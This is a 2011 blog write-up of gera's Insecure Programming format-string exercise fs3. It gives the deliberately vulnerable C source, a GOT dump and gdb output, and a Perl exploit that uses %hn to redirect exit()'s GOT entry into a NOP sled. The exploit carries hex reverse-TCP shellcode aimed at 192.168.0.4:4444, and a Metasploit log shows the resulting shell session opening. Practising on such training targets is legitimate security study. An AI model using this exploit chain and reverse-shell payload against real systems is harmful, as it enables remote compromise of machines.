Wednesday, November 9, 2011

Format Strings: fs3

gera's Insecure Programming fs3.c:

/* fs3.c *
* specially crafted to feed your brain by riq@core-sdi.com */

/* Not enough resources? */

int main(int argv,char **argc) {
char buf[256];

snprintf(buf,sizeof buf,"%s%c%c%hn",argc[1]);
exit(0);
}


This is much the same as fs2 except that there is only one snprintf. From an exploitation point of view this means only 2 bytes can be overwritten with the short int (%hn format specifier).

The GOT looks like this:

fs3: file format elf32-i386

DYNAMIC RELOCATION RECORDS
OFFSET TYPE VALUE
0804958c R_386_GLOB_DAT __gmon_start__
08049574 R_386_JUMP_SLOT __register_frame_info
08049578 R_386_JUMP_SLOT __deregister_frame_info
0804957c R_386_JUMP_SLOT __libc_start_main
08049580 R_386_JUMP_SLOT __cxa_finalize
08049584 R_386_JUMP_SLOT snprintf
08049588 R_386_JUMP_SLOT exit


exit's GOT entry looks like:

(gdb) x/x 0x08049588
0x8049588 <_global_offset_table_>: 0x08048386


The stack region has a base address of 0xbfffXXXX:

(gdb) x/x $esp
0xbffffa00: 0x40016b34


Overwriting exit's base address in GOT with 0xbfff will point it into the stack.

From 0x08048386 to 0xbfff8386

I need to make sure 0xbfff8386 contains a nop slide and shellcode.

#!/usr/bin/perl

# address filler for the %c%c format specifier in the snprintf
my $filler = "A" x 8;

# address for the %hn to write the number of characters to
# exit()'s GOT address, offset by 2 to point to the most significant bytes
# 0x08049588 -> 0x0804958A
my $addr = "\x8a\x95\x04\x08";

# shellcode
# msf3 linux/x86/shell_reverse_tcp, LHOST=192.168.0.4, badchars="\x00"`
my $shellcode =
"\xba\xbb\x01\x12\x0d\xda\xc7\xd9\x74\x24\xf4\x5e\x2b\xc9" .
"\xb1\x12\x83\xc6\x04\x31\x56\x11\x03\x56\x11\xe2\x4e\x30" .
"\xc9\xfa\x53\x60\xae\x57\xf9\x85\xb9\xb9\x4d\xef\x74\xb9" .
"\xf6\xae\xee\x7a\xa0\x4f\xeb\x1c\xd8\x5e\xaf\x86\x4b\x0b" .
"\x5f\x16\x3b\x42\xbe\xdb\xd1\x32\x19\x11\xa5\xe2\x1e\x70" .
"\x15\x2b\xec\x03\x1c\x2d\x17\x53\xf6\xe2\xc8\x27\x6e\x95" .
"\x39\xaa\x07\x0b\xcf\xc9\x87\x80\x46\xec\x97\x2c\x94\x6f";

# enough nops so that 49137 characters are printed. this will overwrite exit's base address in GOT with 0xbfff
my $nops = "\x90" x (49137-length($shellcode));

print $filler.$addr.$nops.$shellcode;



msf exploit(handler) > exploit

[*] Started reverse handler on 192.168.0.4:4444
[*] Starting the payload handler...
[*] Command shell session 1 opened (192.168.0.4:4444 -> 192.168.0.38:58803) at 2011-11-09 19:41:02 -0600

id
uid=500(dennis) gid=500(dennis) groups=500(dennis)
pwd
/home/dennis/fs3

[*] Command shell session 1 closed. Reason: Died from EOFError

No comments:

Post a Comment